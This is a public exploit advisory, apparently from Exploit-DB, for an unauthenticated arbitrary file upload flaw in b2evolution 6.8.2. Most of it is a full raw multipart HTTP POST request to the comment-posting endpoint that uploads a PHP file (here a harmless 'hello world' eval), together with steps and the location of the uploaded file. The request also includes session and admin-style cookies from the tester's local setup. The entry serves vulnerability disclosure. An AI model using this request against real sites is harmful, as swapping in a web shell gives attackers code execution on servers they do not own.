b2evolution 6.8.2 - Arbitrary File Upload

EDB-ID:

41011

CVE:

N/A


Author:

Li Fei

Type:

webapps


Platform:

PHP

Date:

2016-12-29


# Exploit Title: b2evolution6.8.2stable – Upload
# Date: 29/12/2016
# Exploit Author: Li Fei
# Vendor Homepage: http://b2evolution.net/
# Software Link: http://b2evolution.net/downloads/6-8-2-stable?download=6407
# Version: 6.8.2
# Tested on: win7 64bit

No need admin access for upload files and we can upload any file without bypass(.php,.exe,....)

1-goto http://localhost/b2evolution/index.php/a/extended-post

2- click on Browse botton and select you`re file

3- click on upload

Ceshi.php path is:

http://SiteName/ceshi.php

poc url:

POST /b2evolution/htsrv/comment_post.php HTTP/1.1

Poc header:

Host: localhost

Content-Length: 1054

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://localhost

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36

Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZ4hUYCjABZB7YSL

Referer: http://localhost/b2evolution/index.php/a/extended-post

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8

Cookie: session_b2evo=8323_COaAvLi6oU0LKIlMsoa207tOu4MRliDS; iCMS_USER_AUTH=93f92757UuFn7JIQa3nI%252Bk%252FF0s5elmm8KsIgZm%252F357CeOEhJUy7AsnKbPiZUa2eJTzmQx9lPUSaQcNVQtRiWJd%252BCBX0BQ4UpjoiTRBtkGujEc8rTtKoz3IGSFexrQEnmFfxKiL%252B1KR4nGq9wA88zDfJw6c1D7w7xeiYht2Iwo72Fcv8s6JjLcedy52QCOTHRPAFQ%252BdKcClUZz4vjvIvfZi5j6V4xQ1jpbnvV%252FMH6uyw7%252BL4Q41xqDKfgf1j7Sl36%252FGiXHwnij92A6nAMnxG78ZkUg5WG9PY5AtTyEMEtrHAuip7iPJbItdeuTSiTqwoIff%252BLuU4FM9nEldOYY2Jm9UD6XdgaXuyZBHhvb1v0buICmdQPX6rfrki9lZA; iCMS_userid=faf9c76a%252FQiEcyDoXBxmLMRDumokuULwqflVA%252FnfKJbcmsqFgw; iCMS_nickname=a693e7b1f4QEBL83uf0qmVI9BhIOCYq%252FTxa7NPwX8xobJpNm8bA; a8850_times=1; CNZZDATA80862620=cnzz_eid%3D1580835190-1482064117-http%253A%252F%252Flocalhost%252F%26ntime%3D1482064117; iweb_captcha=a95d2426cce76ef614NzA5ODI0NDUwOT5uZjFmY2RibDw4NGMyZjYxYzdmY2Bsa2ppdA; iweb_admin_role_name=6f99d0f079b6898180NDA1OTgwODg2NTk2PWA0Y2IwNGY9YWJgYWI3PmpgO2TrtofivafjrqbnmIXtkZg; iweb_admin_id=bef908b03b94700ce0ODA1MDEwMDAwMGowOTZlNzUwMTg2MDMxMmA3MWIxMzYx; iweb_admin_name=bef908b03b94700ce0ODA1MDEwMDAwMD8xbmUzMWFlOThiOzI3YjVmOjFgMjlhbWxpZg; iweb_admin_pwd=52f2f828c001b132f5NzAwMDc1NDcwMTg9YTE3NW8xYzA0M2E1YDdlYmY9YTllMjBnYmAyOjI5amEyOWNkYGU3NmUwNTdmNDVjPTA1ZQ

Connection: close

 

------WebKitFormBoundarytZ4hUYCjABZB7YSL

Content-Disposition: form-data; name="comment_rating"

 

 

------WebKitFormBoundarytZ4hUYCjABZB7YSL

Content-Disposition: form-data; name="g"

 

 

------WebKitFormBoundarytZ4hUYCjABZB7YSL

Content-Disposition: form-data; name="uploadfile[]"; filename="ceshi.php"

Content-Type: application/octet-stream

 

<?php

eval("echo'hello world';");

?>

------WebKitFormBoundarytZ4hUYCjABZB7YSL

Content-Disposition: form-data; name="submit_comment_post_19[save]"

 

Send comment

------WebKitFormBoundarytZ4hUYCjABZB7YSL

Content-Disposition: form-data; name="crumb_comment"

 

dXuthsKjMjhG2dnhADtzzOW414qV6Qky

------WebKitFormBoundarytZ4hUYCjABZB7YSL

Content-Disposition: form-data; name="comment_type"

 

comment

------WebKitFormBoundarytZ4hUYCjABZB7YSL

Content-Disposition: form-data; name="comment_item_ID"

 

19

------WebKitFormBoundarytZ4hUYCjABZB7YSL

Content-Disposition: form-data; name="redirect_to"

 

http://localhost/b2evolution/index.php/a/extended-post

------WebKitFormBoundarytZ4hUYCjABZB7YSL—